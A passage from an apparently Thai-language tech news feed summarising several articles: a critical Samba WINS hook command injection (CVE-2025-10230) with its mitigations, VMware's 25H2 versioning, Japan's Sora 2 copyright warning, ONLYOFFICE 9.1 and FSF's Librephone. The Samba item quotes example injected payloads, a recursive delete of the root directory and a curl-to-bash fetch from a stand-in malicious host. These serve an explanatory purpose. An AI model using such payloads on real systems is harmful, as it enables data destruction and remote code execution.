    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 ความคิดเห็น 0 การแบ่งปัน 65 มุมมอง 0 รีวิว
  • “VMware Workstation/Fusion เปลี่ยนระบบเวอร์ชันเป็นแบบรายปี” — Broadcom เปิดตัวรุ่น 25H2 พร้อมฟีเจอร์ใหม่และแนวทางใหม่ในการพัฒนา

    Broadcom ประกาศเปลี่ยนแปลงครั้งใหญ่ในระบบเวอร์ชันของซอฟต์แวร์ VMware Workstation Pro และ Fusion Pro โดยเลิกใช้ตัวเลขเวอร์ชันแบบเดิม (เช่น 17.6.x) แล้วหันมาใช้รูปแบบตามปีและช่วงเวลา เช่น “25H2” ซึ่งหมายถึงรุ่นครึ่งหลังของปี 2025 คล้ายกับแนวทางของ Microsoft Windows

    การเปลี่ยนแปลงนี้มาพร้อมกับฟีเจอร์ใหม่หลายรายการในรุ่น 25H2 ได้แก่:

    dictTool: เครื่องมือ command-line สำหรับตรวจสอบและแก้ไขไฟล์ .vmx ซึ่งก่อนหน้านี้ต้องใช้ Notepad หรือ text editor ทั่วไป

    รองรับ USB 3.2: เพิ่มความเร็วในการถ่ายโอนข้อมูลและรองรับอุปกรณ์ใหม่

    ตรวจจับ Hyper-V VM: ช่วยให้ผู้ใช้ทราบว่า VM ทำงานในโหมดใด เพื่อปรับปรุงการทำงานร่วมกัน

    ปรับปรุง accessibility และ UI: แก้ไขปัญหาการปรับขนาดหน้าต่างและการควบคุมบน Windows

    ปรับปรุงแพ็กเกจ Linux: ลดปัญหาในการติดตั้งและแก้ไขข้อผิดพลาด

    ลด log ที่ไม่จำเป็น: เช่น vmauthd ใน Event Viewer

    ยกเลิก vctl tool: ไม่รวมใน Workstation Pro อีกต่อไป

    Broadcom ยังไม่เปิดเผยแผนระยะยาวว่าจะมีรุ่น “26H1” ในครึ่งแรกของปี 2026 หรือไม่ แต่การเปลี่ยนมาใช้ระบบเวอร์ชันแบบรายปีอาจช่วยให้ผู้ใช้เข้าใจรอบการอัปเดตได้ง่ายขึ้น

    ข้อมูลในข่าว
    Broadcom เปลี่ยนระบบเวอร์ชันของ VMware เป็นแบบรายปี เช่น 25H2
    รุ่น 25H2 มาพร้อม dictTool สำหรับจัดการไฟล์ .vmx
    รองรับ USB 3.2 เพื่อเพิ่มความเร็วและความเข้ากันได้
    เพิ่มการตรวจจับ Hyper-V VM เพื่อปรับปรุงการทำงานร่วมกัน
    ปรับปรุง accessibility และ UI บน Windows
    ปรับปรุงแพ็กเกจ Linux ให้ติดตั้งง่ายขึ้น
    ลด log ที่ไม่จำเป็นใน Event Viewer
    แก้ปัญหา VM suspend, full-screen crash และ GPU acceleration บน Linux
    ยกเลิก vctl tool จาก Workstation Pro
    Broadcom ยังไม่ยืนยันว่าจะมีรุ่น 26H1 ในอนาคต

    https://securityonline.info/broadcom-shifts-vmware-workstation-fusion-to-year-based-versioning-with-new-25h2-release/
    🖥️ “VMware Workstation/Fusion เปลี่ยนระบบเวอร์ชันเป็นแบบรายปี” — Broadcom เปิดตัวรุ่น 25H2 พร้อมฟีเจอร์ใหม่และแนวทางใหม่ในการพัฒนา Broadcom ประกาศเปลี่ยนแปลงครั้งใหญ่ในระบบเวอร์ชันของซอฟต์แวร์ VMware Workstation Pro และ Fusion Pro โดยเลิกใช้ตัวเลขเวอร์ชันแบบเดิม (เช่น 17.6.x) แล้วหันมาใช้รูปแบบตามปีและช่วงเวลา เช่น “25H2” ซึ่งหมายถึงรุ่นครึ่งหลังของปี 2025 คล้ายกับแนวทางของ Microsoft Windows การเปลี่ยนแปลงนี้มาพร้อมกับฟีเจอร์ใหม่หลายรายการในรุ่น 25H2 ได้แก่: 🛠️ dictTool: เครื่องมือ command-line สำหรับตรวจสอบและแก้ไขไฟล์ .vmx ซึ่งก่อนหน้านี้ต้องใช้ Notepad หรือ text editor ทั่วไป ⚡ รองรับ USB 3.2: เพิ่มความเร็วในการถ่ายโอนข้อมูลและรองรับอุปกรณ์ใหม่ 🧠 ตรวจจับ Hyper-V VM: ช่วยให้ผู้ใช้ทราบว่า VM ทำงานในโหมดใด เพื่อปรับปรุงการทำงานร่วมกัน 🧩 ปรับปรุง accessibility และ UI: แก้ไขปัญหาการปรับขนาดหน้าต่างและการควบคุมบน Windows 🐧 ปรับปรุงแพ็กเกจ Linux: ลดปัญหาในการติดตั้งและแก้ไขข้อผิดพลาด 🔧 ลด log ที่ไม่จำเป็น: เช่น vmauthd ใน Event Viewer 🛑 ยกเลิก vctl tool: ไม่รวมใน Workstation Pro อีกต่อไป Broadcom ยังไม่เปิดเผยแผนระยะยาวว่าจะมีรุ่น “26H1” ในครึ่งแรกของปี 2026 หรือไม่ แต่การเปลี่ยนมาใช้ระบบเวอร์ชันแบบรายปีอาจช่วยให้ผู้ใช้เข้าใจรอบการอัปเดตได้ง่ายขึ้น ✅ ข้อมูลในข่าว ➡️ Broadcom เปลี่ยนระบบเวอร์ชันของ VMware เป็นแบบรายปี เช่น 25H2 ➡️ รุ่น 25H2 มาพร้อม dictTool สำหรับจัดการไฟล์ .vmx ➡️ รองรับ USB 3.2 เพื่อเพิ่มความเร็วและความเข้ากันได้ ➡️ เพิ่มการตรวจจับ Hyper-V VM เพื่อปรับปรุงการทำงานร่วมกัน ➡️ ปรับปรุง accessibility และ UI บน Windows ➡️ ปรับปรุงแพ็กเกจ Linux ให้ติดตั้งง่ายขึ้น ➡️ ลด log ที่ไม่จำเป็นใน Event Viewer ➡️ แก้ปัญหา VM suspend, full-screen crash และ GPU acceleration บน Linux ➡️ ยกเลิก vctl tool จาก Workstation Pro ➡️ Broadcom ยังไม่ยืนยันว่าจะมีรุ่น 26H1 ในอนาคต https://securityonline.info/broadcom-shifts-vmware-workstation-fusion-to-year-based-versioning-with-new-25h2-release/
    SECURITYONLINE.INFO
    Broadcom Shifts VMware Workstation/Fusion to Year-Based Versioning with New 25H2 Release
    Broadcom is shifting VMware Workstation Pro/Fusion to year-based versioning (e.g., 25H2). The new release adds dictTool for .vmx editing, USB 3.2 support, and Hyper-V VM detection.
    0 ความคิดเห็น 0 การแบ่งปัน 61 มุมมอง 0 รีวิว
  • “ญี่ปุ่นเตือน OpenAI เรื่อง Sora 2” — หวั่นละเมิดลิขสิทธิ์อนิเมะและมังงะที่ถือเป็น ‘สมบัติวัฒนธรรมที่ไม่อาจทดแทนได้’

    รัฐบาลญี่ปุ่น โดยรัฐมนตรี Minoru Kōno ได้ออกแถลงการณ์เตือน OpenAI อย่างเป็นทางการเกี่ยวกับความกังวลด้านลิขสิทธิ์ หลังจากการเปิดตัวแพลตฟอร์ม Sora 2 ซึ่งเป็นระบบสร้างวิดีโอ AI ที่สามารถผลิตคลิป 1080p พร้อมเสียงได้ภายใน 20 วินาที

    ญี่ปุ่นระบุว่า อนิเมะและมังงะเป็น “อัญมณีทางวัฒนธรรมที่ไม่อาจทดแทนได้” และการที่ผู้ใช้ Sora 2 นำเนื้อหาจากแฟรนไชส์ดังอย่าง Dragon Ball หรือ Pokémon ไปสร้างวิดีโอโดยไม่ได้รับอนุญาต ถือเป็นการละเมิดสิทธิ์อย่างร้ายแรง

    แม้ญี่ปุ่นจะเป็นหนึ่งในประเทศที่ส่งเสริม AI อย่างแข็งขัน แต่ก็พยายามสร้างสมดุลระหว่างนวัตกรรมและการคุ้มครองทรัพย์สินทางปัญญา โดยมีการออกกฎหมาย AI Promotion Act และแนวทางปฏิบัติด้านลิขสิทธิ์

    ในเบื้องต้น OpenAI ได้ติดต่อพันธมิตรในอุตสาหกรรมเพื่อเสนอให้ “opt-out” จากการใช้ข้อมูลของพวกเขาในการฝึกโมเดล Sora 2 แต่ยังไม่มีข้อมูลว่าบริษัทญี่ปุ่นใดตอบรับหรือปฏิเสธ

    นักการเมืองญี่ปุ่นอย่าง Akihisa Shiozaki ยังกล่าวว่า “ญี่ปุ่นมีหน้าที่เป็นผู้นำในการถกเถียงระดับโลกเรื่อง AI และลิขสิทธิ์ เพราะเราเป็นประเทศที่สร้างอนิเมะ เกม และดนตรี”

    ข้อมูลในข่าว
    ญี่ปุ่นเตือน OpenAI เรื่องการละเมิดลิขสิทธิ์ผ่านแพลตฟอร์ม Sora 2
    Sora 2 สามารถสร้างวิดีโอ 1080p พร้อมเสียงได้ภายใน 20 วินาที
    ผู้ใช้บางรายนำเนื้อหาจาก Dragon Ball และ Pokémon ไปใช้โดยไม่ได้รับอนุญาต
    ญี่ปุ่นมองว่าอนิเมะและมังงะเป็น “สมบัติวัฒนธรรมที่ไม่อาจทดแทนได้”
    รัฐบาลญี่ปุ่นมี AI Promotion Act และแนวทางด้านลิขสิทธิ์
    OpenAI เสนอให้พันธมิตร opt-out จากการใช้ข้อมูลในการฝึกโมเดล
    ยังไม่ชัดเจนว่าบริษัทญี่ปุ่นใดตอบรับหรือปฏิเสธ
    Akihisa Shiozaki ระบุว่าญี่ปุ่นควรเป็นผู้นำในการกำหนดมาตรฐาน AI และลิขสิทธิ์

    https://securityonline.info/japan-warns-openai-over-sora-2-copyright-infringement-of-irreplaceable-anime-and-manga/
    🎌 “ญี่ปุ่นเตือน OpenAI เรื่อง Sora 2” — หวั่นละเมิดลิขสิทธิ์อนิเมะและมังงะที่ถือเป็น ‘สมบัติวัฒนธรรมที่ไม่อาจทดแทนได้’ รัฐบาลญี่ปุ่น โดยรัฐมนตรี Minoru Kōno ได้ออกแถลงการณ์เตือน OpenAI อย่างเป็นทางการเกี่ยวกับความกังวลด้านลิขสิทธิ์ หลังจากการเปิดตัวแพลตฟอร์ม Sora 2 ซึ่งเป็นระบบสร้างวิดีโอ AI ที่สามารถผลิตคลิป 1080p พร้อมเสียงได้ภายใน 20 วินาที ญี่ปุ่นระบุว่า อนิเมะและมังงะเป็น “อัญมณีทางวัฒนธรรมที่ไม่อาจทดแทนได้” และการที่ผู้ใช้ Sora 2 นำเนื้อหาจากแฟรนไชส์ดังอย่าง Dragon Ball หรือ Pokémon ไปสร้างวิดีโอโดยไม่ได้รับอนุญาต ถือเป็นการละเมิดสิทธิ์อย่างร้ายแรง แม้ญี่ปุ่นจะเป็นหนึ่งในประเทศที่ส่งเสริม AI อย่างแข็งขัน แต่ก็พยายามสร้างสมดุลระหว่างนวัตกรรมและการคุ้มครองทรัพย์สินทางปัญญา โดยมีการออกกฎหมาย AI Promotion Act และแนวทางปฏิบัติด้านลิขสิทธิ์ ในเบื้องต้น OpenAI ได้ติดต่อพันธมิตรในอุตสาหกรรมเพื่อเสนอให้ “opt-out” จากการใช้ข้อมูลของพวกเขาในการฝึกโมเดล Sora 2 แต่ยังไม่มีข้อมูลว่าบริษัทญี่ปุ่นใดตอบรับหรือปฏิเสธ นักการเมืองญี่ปุ่นอย่าง Akihisa Shiozaki ยังกล่าวว่า “ญี่ปุ่นมีหน้าที่เป็นผู้นำในการถกเถียงระดับโลกเรื่อง AI และลิขสิทธิ์ เพราะเราเป็นประเทศที่สร้างอนิเมะ เกม และดนตรี” ✅ ข้อมูลในข่าว ➡️ ญี่ปุ่นเตือน OpenAI เรื่องการละเมิดลิขสิทธิ์ผ่านแพลตฟอร์ม Sora 2 ➡️ Sora 2 สามารถสร้างวิดีโอ 1080p พร้อมเสียงได้ภายใน 20 วินาที ➡️ ผู้ใช้บางรายนำเนื้อหาจาก Dragon Ball และ Pokémon ไปใช้โดยไม่ได้รับอนุญาต ➡️ ญี่ปุ่นมองว่าอนิเมะและมังงะเป็น “สมบัติวัฒนธรรมที่ไม่อาจทดแทนได้” ➡️ รัฐบาลญี่ปุ่นมี AI Promotion Act และแนวทางด้านลิขสิทธิ์ ➡️ OpenAI เสนอให้พันธมิตร opt-out จากการใช้ข้อมูลในการฝึกโมเดล ➡️ ยังไม่ชัดเจนว่าบริษัทญี่ปุ่นใดตอบรับหรือปฏิเสธ ➡️ Akihisa Shiozaki ระบุว่าญี่ปุ่นควรเป็นผู้นำในการกำหนดมาตรฐาน AI และลิขสิทธิ์ https://securityonline.info/japan-warns-openai-over-sora-2-copyright-infringement-of-irreplaceable-anime-and-manga/
    SECURITYONLINE.INFO
    Japan Warns OpenAI Over Sora 2 Copyright Infringement of "Irreplaceable" Anime and Manga
    Japan formally requested OpenAI to stop Sora 2 from infringing on its "irreplaceable" anime and manga IP after users generated videos of Dragon Ball and Pokémon.
    0 ความคิดเห็น 0 การแบ่งปัน 77 มุมมอง 0 รีวิว
  • “ONLYOFFICE Docs 9.1 มาแล้ว!” — ปรับปรุงการทำงานร่วมกัน เพิ่มฟีเจอร์ Redact PDF และประสิทธิภาพสูตรคำนวณ

    หลังจากเปิดตัวเวอร์ชัน 9.0 ที่มาพร้อมอินเทอร์เฟซใหม่และฟีเจอร์ AI ล่าสุด ทีมพัฒนา ONLYOFFICE ได้ปล่อยเวอร์ชัน 9.1 ซึ่งเป็นการอัปเดตจุดแรกในซีรีส์ 9.x โดยเน้นการปรับปรุงประสิทธิภาพ ความสามารถในการทำงานร่วมกัน และเครื่องมือใหม่ที่ตอบโจทย์ผู้ใช้สายเอกสารและองค์กร

    ฟีเจอร์เด่นในเวอร์ชันนี้คือเครื่องมือ “Redact” สำหรับ PDF ที่ช่วยลบข้อมูลสำคัญอย่างถาวร พร้อมตัวเลือก “Find & Redact” สำหรับเอกสารขนาดใหญ่ และการ Redact แบบทั้งหน้า/ช่วงหน้า นอกจากนี้ยังมีเครื่องมือ annotation ใหม่ เช่น วาดรูปทรงต่าง ๆ ลงบนเอกสาร

    ในด้านการแก้ไขเอกสารทั่วไป:

    การจัดการคอมเมนต์สามารถกรองระหว่าง “Open” และ “Resolved” ได้
    การแก้ไขกราฟรองรับการระเบิด (Explosion) สำหรับกราฟวงกลม
    การจัดการตารางมีแท็บ “Table Design” ใหม่
    Pivot Table รองรับการกรองตามวันที่
    สูตร LOOKUP, VLOOKUP, HLOOKUP และ XLOOKUP ทำงานเร็วขึ้นและใช้หน่วยความจำดีขึ้น
    การตั้งชื่อชีตและการใส่สูตรมีการเน้น argument เพื่อความเข้าใจง่าย

    ใน Presentation Editor มีแท็บ Slide Master ใหม่ ส่วน Document Editor รองรับ section break ใน block content control ทุกระดับ

    ด้านการรองรับไฟล์:
    เปิดดูภาพ HEIF และเอกสาร HWPML ได้
    แปลง PDF เป็น TXT และ PPTX เป็น TXT ได้โดยตรง
    รองรับสูตรคณิตศาสตร์ในรูปแบบ MathML

    เวอร์ชันเซิร์ฟเวอร์ยังมี Admin Panel ใหม่สำหรับดูสถานะและการตั้งค่าระบบ พร้อมการปรับปรุง localization สำหรับภาษาจีนดั้งเดิมและเซอร์เบีย

    ข้อมูลในข่าว
    ONLYOFFICE Docs 9.1 เป็นอัปเดตจุดแรกในซีรีส์ 9.x
    เพิ่มเครื่องมือ Redact สำหรับ PDF พร้อม Find & Redact และ Redact แบบช่วงหน้า
    เพิ่ม annotation tools เช่น Rectangle, Circle, Arrow, Connected Lines
    กรองคอมเมนต์ระหว่าง “Open” และ “Resolved” ได้
    รองรับ Explosion ในกราฟวงกลม 2D
    LOOKUP, VLOOKUP, HLOOKUP, XLOOKUP ทำงานเร็วขึ้น
    มีแท็บ “Table Design” สำหรับจัดการตาราง
    Pivot Table รองรับการกรองตามวันที่
    ตั้งชื่อชีตได้ทันที และสูตรมีการเน้น argument
    Presentation Editor มีแท็บ Slide Master ใหม่
    Document Editor รองรับ section break ใน block content control
    รองรับ HEIF, HWPML, PDF→TXT, PPTX→TXT, MathML
    เวอร์ชันเซิร์ฟเวอร์มี Admin Panel ใหม่
    ปรับปรุง localization สำหรับภาษาจีนดั้งเดิมและเซอร์เบีย

    https://news.itsfoss.com/onlyoffice-docs-9-1-release/
    📝 “ONLYOFFICE Docs 9.1 มาแล้ว!” — ปรับปรุงการทำงานร่วมกัน เพิ่มฟีเจอร์ Redact PDF และประสิทธิภาพสูตรคำนวณ หลังจากเปิดตัวเวอร์ชัน 9.0 ที่มาพร้อมอินเทอร์เฟซใหม่และฟีเจอร์ AI ล่าสุด ทีมพัฒนา ONLYOFFICE ได้ปล่อยเวอร์ชัน 9.1 ซึ่งเป็นการอัปเดตจุดแรกในซีรีส์ 9.x โดยเน้นการปรับปรุงประสิทธิภาพ ความสามารถในการทำงานร่วมกัน และเครื่องมือใหม่ที่ตอบโจทย์ผู้ใช้สายเอกสารและองค์กร ฟีเจอร์เด่นในเวอร์ชันนี้คือเครื่องมือ “Redact” สำหรับ PDF ที่ช่วยลบข้อมูลสำคัญอย่างถาวร พร้อมตัวเลือก “Find & Redact” สำหรับเอกสารขนาดใหญ่ และการ Redact แบบทั้งหน้า/ช่วงหน้า นอกจากนี้ยังมีเครื่องมือ annotation ใหม่ เช่น วาดรูปทรงต่าง ๆ ลงบนเอกสาร ในด้านการแก้ไขเอกสารทั่วไป: 📝 การจัดการคอมเมนต์สามารถกรองระหว่าง “Open” และ “Resolved” ได้ 📝 การแก้ไขกราฟรองรับการระเบิด (Explosion) สำหรับกราฟวงกลม 📝 การจัดการตารางมีแท็บ “Table Design” ใหม่ 📝 Pivot Table รองรับการกรองตามวันที่ 📝 สูตร LOOKUP, VLOOKUP, HLOOKUP และ XLOOKUP ทำงานเร็วขึ้นและใช้หน่วยความจำดีขึ้น 📝 การตั้งชื่อชีตและการใส่สูตรมีการเน้น argument เพื่อความเข้าใจง่าย ใน Presentation Editor มีแท็บ Slide Master ใหม่ ส่วน Document Editor รองรับ section break ใน block content control ทุกระดับ ด้านการรองรับไฟล์: 📝 เปิดดูภาพ HEIF และเอกสาร HWPML ได้ 📝 แปลง PDF เป็น TXT และ PPTX เป็น TXT ได้โดยตรง 📝 รองรับสูตรคณิตศาสตร์ในรูปแบบ MathML เวอร์ชันเซิร์ฟเวอร์ยังมี Admin Panel ใหม่สำหรับดูสถานะและการตั้งค่าระบบ พร้อมการปรับปรุง localization สำหรับภาษาจีนดั้งเดิมและเซอร์เบีย ✅ ข้อมูลในข่าว ➡️ ONLYOFFICE Docs 9.1 เป็นอัปเดตจุดแรกในซีรีส์ 9.x ➡️ เพิ่มเครื่องมือ Redact สำหรับ PDF พร้อม Find & Redact และ Redact แบบช่วงหน้า ➡️ เพิ่ม annotation tools เช่น Rectangle, Circle, Arrow, Connected Lines ➡️ กรองคอมเมนต์ระหว่าง “Open” และ “Resolved” ได้ ➡️ รองรับ Explosion ในกราฟวงกลม 2D ➡️ LOOKUP, VLOOKUP, HLOOKUP, XLOOKUP ทำงานเร็วขึ้น ➡️ มีแท็บ “Table Design” สำหรับจัดการตาราง ➡️ Pivot Table รองรับการกรองตามวันที่ ➡️ ตั้งชื่อชีตได้ทันที และสูตรมีการเน้น argument ➡️ Presentation Editor มีแท็บ Slide Master ใหม่ ➡️ Document Editor รองรับ section break ใน block content control ➡️ รองรับ HEIF, HWPML, PDF→TXT, PPTX→TXT, MathML ➡️ เวอร์ชันเซิร์ฟเวอร์มี Admin Panel ใหม่ ➡️ ปรับปรุง localization สำหรับภาษาจีนดั้งเดิมและเซอร์เบีย https://news.itsfoss.com/onlyoffice-docs-9-1-release/
    NEWS.ITSFOSS.COM
    ONLYOFFICE Docs 9.1 Arrives with PDF Redaction and Many Editor Upgrades
    New redaction tools, performance boosts, and enhanced collaboration features.
    0 ความคิดเห็น 0 การแบ่งปัน 48 มุมมอง 0 รีวิว
  • “Librephone โดย FSF” — โปรเจกต์ปลดปล่อยมือถือจากซอฟต์แวร์ปิดซอร์ส ไม่ใช่แค่ Android fork แต่คือการท้าทายโครงสร้างระบบมือถือทั้งวงการ

    ในงานครบรอบ 40 ปีของ Free Software Foundation (FSF) ที่จัดขึ้นในบอสตัน มีการเปิดตัวโปรเจกต์ใหม่ชื่อ “Librephone” ซึ่งไม่ใช่แค่การสร้างระบบปฏิบัติการมือถือแบบโอเพ่นซอร์ส แต่เป็นความพยายามครั้งใหญ่ในการ “ปลดปล่อย” มือถือจากซอฟต์แวร์ปิดซอร์สที่ฝังอยู่ในชิปและเฟิร์มแวร์

    Rob Savoye หัวหน้าทีมพัฒนา Librephone ซึ่งมีประสบการณ์ยาวนานกับ GNU toolchain ระบุว่า เป้าหมายหลักของโปรเจกต์คือการ reverse-engineer และแทนที่ binary blobs ที่อยู่ใน SoC (System-on-Chip) ของมือถือ ซึ่งเป็นส่วนที่ทำให้ผู้ใช้ไม่สามารถควบคุมอุปกรณ์ของตัวเองได้อย่างแท้จริง

    FSF ยืนยันว่า Librephone ไม่ใช่แค่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ใหม่ แต่จะเน้นการสร้างสเปกที่ชัดเจนสำหรับนักพัฒนานอกเขต DMCA เพื่อให้สามารถสร้างระบบที่เป็นอิสระได้ โดยจะเริ่มจากอุปกรณ์ที่มี “ปัญหาเรื่องเสรีภาพ” น้อยที่สุดก่อน

    แม้แต่ระบบยอดนิยมอย่าง LineageOS ก็ยังมี binary blobs อยู่ FSF จึงหวังว่า Librephone จะเป็นรากฐานให้กับระบบที่ปลอดจากซอฟต์แวร์ปิดซอร์สอย่างแท้จริง เช่นเดียวกับที่เคยสนับสนุนโครงการ Replicant มาก่อน

    ที่สำคัญคือ FSF ต้องการให้ชุมชนมีส่วนร่วม ไม่ว่าจะเป็นนักพัฒนา ผู้ทดสอบ นักเขียนเอกสาร หรือผู้สนับสนุนด้านการเงิน โดยสามารถติดตามรายละเอียดเพิ่มเติมได้ที่ librephone.fsf.org

    ข้อมูลในข่าว
    Librephone เป็นโปรเจกต์ใหม่จาก Free Software Foundation (FSF)
    เป้าหมายคือการ reverse-engineer และแทนที่ proprietary binary blobs ในมือถือ
    ไม่ใช่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์
    มุ่งเน้นการสร้างสเปกสำหรับนักพัฒนานอกเขต DMCA
    เริ่มจากอุปกรณ์ที่มีปัญหาเรื่องเสรีภาพน้อยที่สุด
    Rob Savoye เป็นหัวหน้าทีมพัฒนา มีประสบการณ์กับ GNU toolchain
    FSF เคยสนับสนุนโครงการ Replicant มาก่อน
    LineageOS ยังมี binary blobs อยู่
    Librephone จะเป็นรากฐานให้กับระบบมือถือที่เสรีอย่างแท้จริง
    เปิดรับอาสาสมัครทุกระดับ ไม่จำกัดเฉพาะวิศวกร
    สนับสนุนได้ผ่านการบริจาค ทดสอบ เขียนเอกสาร หรือเผยแพร่ข้อมูล

    https://news.itsfoss.com/librephone-project-overview/
    📱 “Librephone โดย FSF” — โปรเจกต์ปลดปล่อยมือถือจากซอฟต์แวร์ปิดซอร์ส ไม่ใช่แค่ Android fork แต่คือการท้าทายโครงสร้างระบบมือถือทั้งวงการ ในงานครบรอบ 40 ปีของ Free Software Foundation (FSF) ที่จัดขึ้นในบอสตัน มีการเปิดตัวโปรเจกต์ใหม่ชื่อ “Librephone” ซึ่งไม่ใช่แค่การสร้างระบบปฏิบัติการมือถือแบบโอเพ่นซอร์ส แต่เป็นความพยายามครั้งใหญ่ในการ “ปลดปล่อย” มือถือจากซอฟต์แวร์ปิดซอร์สที่ฝังอยู่ในชิปและเฟิร์มแวร์ Rob Savoye หัวหน้าทีมพัฒนา Librephone ซึ่งมีประสบการณ์ยาวนานกับ GNU toolchain ระบุว่า เป้าหมายหลักของโปรเจกต์คือการ reverse-engineer และแทนที่ binary blobs ที่อยู่ใน SoC (System-on-Chip) ของมือถือ ซึ่งเป็นส่วนที่ทำให้ผู้ใช้ไม่สามารถควบคุมอุปกรณ์ของตัวเองได้อย่างแท้จริง FSF ยืนยันว่า Librephone ไม่ใช่แค่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ใหม่ แต่จะเน้นการสร้างสเปกที่ชัดเจนสำหรับนักพัฒนานอกเขต DMCA เพื่อให้สามารถสร้างระบบที่เป็นอิสระได้ โดยจะเริ่มจากอุปกรณ์ที่มี “ปัญหาเรื่องเสรีภาพ” น้อยที่สุดก่อน แม้แต่ระบบยอดนิยมอย่าง LineageOS ก็ยังมี binary blobs อยู่ FSF จึงหวังว่า Librephone จะเป็นรากฐานให้กับระบบที่ปลอดจากซอฟต์แวร์ปิดซอร์สอย่างแท้จริง เช่นเดียวกับที่เคยสนับสนุนโครงการ Replicant มาก่อน ที่สำคัญคือ FSF ต้องการให้ชุมชนมีส่วนร่วม ไม่ว่าจะเป็นนักพัฒนา ผู้ทดสอบ นักเขียนเอกสาร หรือผู้สนับสนุนด้านการเงิน โดยสามารถติดตามรายละเอียดเพิ่มเติมได้ที่ librephone.fsf.org ✅ ข้อมูลในข่าว ➡️ Librephone เป็นโปรเจกต์ใหม่จาก Free Software Foundation (FSF) ➡️ เป้าหมายคือการ reverse-engineer และแทนที่ proprietary binary blobs ในมือถือ ➡️ ไม่ใช่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ ➡️ มุ่งเน้นการสร้างสเปกสำหรับนักพัฒนานอกเขต DMCA ➡️ เริ่มจากอุปกรณ์ที่มีปัญหาเรื่องเสรีภาพน้อยที่สุด ➡️ Rob Savoye เป็นหัวหน้าทีมพัฒนา มีประสบการณ์กับ GNU toolchain ➡️ FSF เคยสนับสนุนโครงการ Replicant มาก่อน ➡️ LineageOS 